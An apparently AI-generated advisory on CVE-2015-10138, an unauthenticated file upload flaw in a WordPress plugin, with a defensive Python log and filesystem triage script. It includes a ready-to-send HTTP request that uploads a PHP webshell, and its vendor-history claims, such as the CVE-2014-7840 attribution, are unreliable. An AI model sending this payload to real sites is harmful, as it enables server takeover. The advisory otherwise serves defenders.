WordPress Work The Flow File Upload (CVE-2015-10138): Unauthenticated Arbitrary File Upload to RCE
When a single HTTP request can grant an attacker full control of your WordPress site, the stakes are clear. CVE-2015-10138 is a textbook example of how a simple file upload flaw can escalate to remote code execution (RCE) and complete server compromise. In this post, we dissect the vulnerability, walk through a real-world proof of concept, and provide actionable intelligence for defenders and incident responders.
Introduction
The Work The Flow File Upload plugin, though not a household name, was used on over a thousand WordPress sites at its peak. Designed to simplify file uploads for end-users, it instead opened the door to unauthenticated arbitrary file uploads due to a critical flaw in its jQuery-File-Upload-9.5.0 component. This vulnerability (CVE-2015-10138) allowed attackers to upload and execute malicious files—most notably, PHP webshells—without any authentication, making it a prime target for mass exploitation campaigns and automated attack tools.
About the Plugin:
- Work The Flow File Upload: A WordPress plugin aimed at providing user-friendly file upload capabilities. At its peak it had ~1,000 active installations. That small install base is outweighed by the severity of this flaw: any site running a vulnerable version is at risk of total compromise.
Technical Information
Vulnerability Mechanism
The vulnerability is rooted in the plugin's bundled jQuery-File-Upload-9.5.0 library. The server-side PHP handler at:
/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php
fails to enforce file type validation and does not require authentication. As a result, any remote user can upload arbitrary files—including executable PHP scripts—directly to the server.
Key Technical Weaknesses:
- No File Type Validation: The upload handler does not restrict file extensions or validate MIME types. Attackers can upload .php files or other executable content.
- Unauthenticated Access: No authentication or authorization checks are performed on the upload endpoint.
- Predictable Storage Path: Uploaded files are placed in a known directory:
/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/
Exploitation Flow
- Crafted HTTP POST: The attacker sends a multipart/form-data POST request to the vulnerable endpoint, specifying a malicious file (e.g., shell.php).
- File Upload: The server saves the file in the predictable directory, accessible via the web.
- Remote Execution: The attacker accesses the uploaded PHP file via the browser or a direct HTTP request, executing arbitrary code on the server.
Example HTTP Request
POST /wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php HTTP/1.1
Host: victim-site.com
Content-Type: multipart/form-data; boundary=---------------------------123456789123456

-----------------------------123456789123456
Content-Disposition: form-data; name="files[]"; filename="shell.php"
Content-Type: application/octet-stream

<?php system($_GET['cmd']); ?>
-----------------------------123456789123456--
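The request above, followed by the execution step, leaves a recognisable two-step trace in the web server access log: a POST to the plugin's index.php, then a request for a script under the files/ directory, often from the same source within seconds. The following is an added detection and triage example, not part of the original post and not derived from the Metasploit module; the access-log lines are constructed for illustration, while the endpoint and storage paths are the ones named in this advisory.

```python
"""
Detection and incident-response triage for the upload-to-RCE chain.

Added example, not from the original post or the Metasploit module. The log
lines in SAMPLE_LOG are constructed; the URL paths are those the advisory names.
"""
import os
import re
from collections import defaultdict
from datetime import datetime, timedelta

PLUGIN_BASE = ("/wp-content/plugins/work-the-flow-file-upload/public/assets/"
               "jQuery-File-Upload-9.5.0/server/php/")
UPLOAD_ENDPOINT = PLUGIN_BASE + "index.php"
STORAGE_PREFIX = PLUGIN_BASE + "files/"
# Extensions a typical PHP-enabled web server will execute; the \b also
# catches double extensions such as "shell.php.png".
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)\b", re.IGNORECASE)

# Apache/nginx "combined" log format: ip ident user [ts] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one full attack chain, one benign download, one benign
# page hit, and one script request with no prior upload from that source.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Apr/2015:13:55:36 +0000] "POST ' + UPLOAD_ENDPOINT + ' HTTP/1.1" 200 143 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Apr/2015:13:55:37 +0000] "GET ' + STORAGE_PREFIX + 'shell.php?cmd=id HTTP/1.1" 200 61 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Apr/2015:14:02:11 +0000] "GET ' + STORAGE_PREFIX + 'report.pdf HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Apr/2015:14:02:30 +0000] "GET /index.php HTTP/1.1" 200 8800 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Apr/2015:14:10:00 +0000] "GET ' + STORAGE_PREFIX + 'backdoor.phtml HTTP/1.1" 200 61 "-" "curl/7.38.0"',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "status": int(m.group("status"))}


def analyze_log(lines, window=timedelta(minutes=10)):
    """Return (severity, source_ip, detail) findings in log order.

    medium:   POST to the unauthenticated upload endpoint (legitimate use looks
              the same, so this is a lead, not proof).
    high:     request for an executable file inside the upload directory.
    critical: that request follows an upload from the same source within `window`.
    """
    findings = []
    uploads_by_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        path = ev["path"]
        if ev["method"] == "POST" and path.split("?")[0] == UPLOAD_ENDPOINT:
            uploads_by_ip[ev["ip"]].append(ev["ts"])
            findings.append(("medium", ev["ip"], "POST to unauthenticated upload endpoint"))
        elif path.startswith(STORAGE_PREFIX) and EXEC_EXT.search(path):
            severity = "high"
            if any(timedelta(0) <= ev["ts"] - t <= window for t in uploads_by_ip[ev["ip"]]):
                severity = "critical"
            findings.append((severity, ev["ip"], f"executable file requested in upload dir: {path}"))
    return findings


def find_executable_uploads(storage_dir):
    """Filesystem triage: list files in the plugin's storage directory that the
    web server would execute. The handler never legitimately accepts scripts,
    so every hit is an artifact to preserve and examine."""
    hits = []
    for root, _, names in os.walk(storage_dir):
        for name in names:
            if EXEC_EXT.search(name):
                hits.append(os.path.join(root, name))
    return sorted(hits)


if __name__ == "__main__":
    for severity, ip, detail in analyze_log(SAMPLE_LOG):
        print(f"[{severity:8}] {ip:15} {detail}")
```

The log analysis escalates only when the same source both uploaded and then requested a script, which separates the attack chain from a legitimate user of the plugin; the directory sweep is the corresponding host-side check to run during response, since the advisory's storage path is fixed and should never contain PHP.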
Root Cause
The root cause is the absence of both server-side file type validation and authentication. The upload handler trusts user input, allowing attackers to bypass any client-side restrictions and upload executable files.
Proof of Concept
The Metasploit module wp_worktheflow_upload.rb targets this vulnerability by automating the attack:
- It sends a specially crafted HTTP POST request to the plugin's upload endpoint.
- The request includes a malicious PHP file disguised as an allowed file type.
- Upon successful upload, the module accesses the file to trigger remote code execution, providing a shell to the attacker.
Attack Steps:
- Set the target URL and payload path in Metasploit.
- Run the module; it uploads the payload and executes it, granting remote shell access.
This exploit is possible due to the lack of file type validation and authentication in the upload handler.
Reference: Metasploit Module Source
Affected Systems and Versions
- Product: Work The Flow File Upload plugin for WordPress
- Affected Versions: Up to and including 2.5.2
- Vulnerable Component: jQuery-File-Upload-9.5.0 within the plugin
- Vulnerable Endpoint:
/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php
- Configuration: All default installations of affected versions are vulnerable; no special configuration is required.
Vendor Security History
- Previous Vulnerabilities: The vendor has a history of critical flaws, including CVE-2014-7840 (file upload bypass) and unpatched high-severity issues.
- Patch Response: Patch delays ranged from several days to weeks. The fix for CVE-2015-10138 was released in version 2.5.3.
- Security Maturity: The vendor relied on outdated third-party libraries and ceased maintenance after acquisition, leaving legacy installs exposed.
References
- NVD Entry for CVE-2015-10138
- MITRE CVE Entry
- Acunetix Advisory
- WPScan Advisory
- Homelab.it Analysis
- Wordfence Threat Intel
- ExploitDB PoC 36640
- Packet Storm 131294
- Packet Storm 131512
- Rapid7 Metasploit Module
- Metasploit Module Source
Source: This report was created using AI
If you have suggestions for improvement or feedback, please reach out to us at [email protected]